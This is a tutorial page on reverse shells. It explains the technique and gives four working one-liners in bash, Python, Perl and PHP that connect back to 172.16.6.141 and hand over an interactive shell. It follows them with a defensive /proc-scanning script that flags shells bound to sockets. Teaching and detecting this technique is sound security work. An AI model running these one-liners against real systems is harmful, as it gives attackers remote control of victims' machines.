Reverse shells
Reverse shells: [ How it Works ]
A reverse shell, also known as a remote shell or “connect-back shell,” exploits a vulnerability on the target system to start a shell session from the target that connects back to the attacker, who then has access to the victim’s computer.
The goal is to make the target connect to a remote computer and redirect the standard input and output of the target system’s shell over that connection, so the attacker can use the shell remotely.
Reverse shells give attackers a communication channel to the target machine and can lead to a complete takeover of it, so they are a severe security threat. The same technique is commonly used in penetration tests.
Attention
You shouldn't attack any machine that you are not authorized to test.
Examples
Some basic examples, in bash:
bash -i >& /dev/tcp/172.16.6.141/6666 0>&1
In Python:
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); v_ip="172.16.6.141"; s.connect((v_ip,4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); v_shell_path="/usr/bin/bash";v_shell_value="-i"; p=subprocess.call([v_shell_path,v_shell_value]);'
In Perl:
perl -e 'use Socket; $i="172.16.6.141";$p=6666; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/usr/bin/bash -i");};'
In PHP:
php -r '$sock=fsockopen("172.16.6.141",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
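Every one-liner above ends in the same state: a shell whose file descriptors 0, 1 and 2 point at a TCP socket instead of a terminal or pipe. That state is visible in /proc and is a simple host-side detection. The following is an added defensive example, not code from the original page; the process names in SHELL_NAMES and the sample snapshot are assumptions constructed for illustration.

```python
import os
import re
# Shells and interpreters whose std fds should be a tty or pipe, never a socket
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "python3", "perl", "php"}
_SOCKET_RE = re.compile(r"^socket:\[\d+\]$")  # /proc/<pid>/fd/<n> link target for a socket

def flag_socket_bound_shells(snapshot: dict[int, dict]) -> list[dict]:
    """snapshot: {pid: {"comm": name, "fds": {fd_number: link_target}}}. Returns one
    finding per shell/interpreter whose fd 0, 1 or 2 is a socket (the dup2 / >& state)."""
    findings = []
    for pid, info in sorted(snapshot.items()):
        if info["comm"] not in SHELL_NAMES:
            continue
        bound = [fd for fd in (0, 1, 2) if _SOCKET_RE.match(info["fds"].get(fd, ""))]
        if bound:
            findings.append({"pid": pid, "comm": info["comm"], "socket_fds": bound})
    return findings

def collect_proc_snapshot() -> dict[int, dict]:
    """Build a snapshot from a live Linux /proc (reading other users' fds needs root)."""
    snap = {}
    if not os.path.isdir("/proc"):
        return snap
    for entry in filter(str.isdigit, os.listdir("/proc")):
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue  # process exited or not readable
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
            except OSError:
                pass
        snap[pid] = {"comm": comm, "fds": fds}
    return snap

# Constructed sample snapshot, not captured from a real host
SAMPLE = {
    101: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    202: {"comm": "bash", "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    303: {"comm": "sh", "fds": {0: "pipe:[9001]", 1: "socket:[48777]", 2: "socket:[48777]"}},
    404: {"comm": "nginx", "fds": {0: "/dev/null", 1: "socket:[555]", 2: "socket:[555]"}},
}

if __name__ == "__main__":
    for hit in flag_socket_bound_shells(SAMPLE):  # use collect_proc_snapshot() for a live scan
        print(hit)
```

Shells launched by socket-activated or inetd-style services legitimately inherit a socket on fd 0, so treat a hit as a lead to correlate with the peer address and parent process rather than as proof on its own.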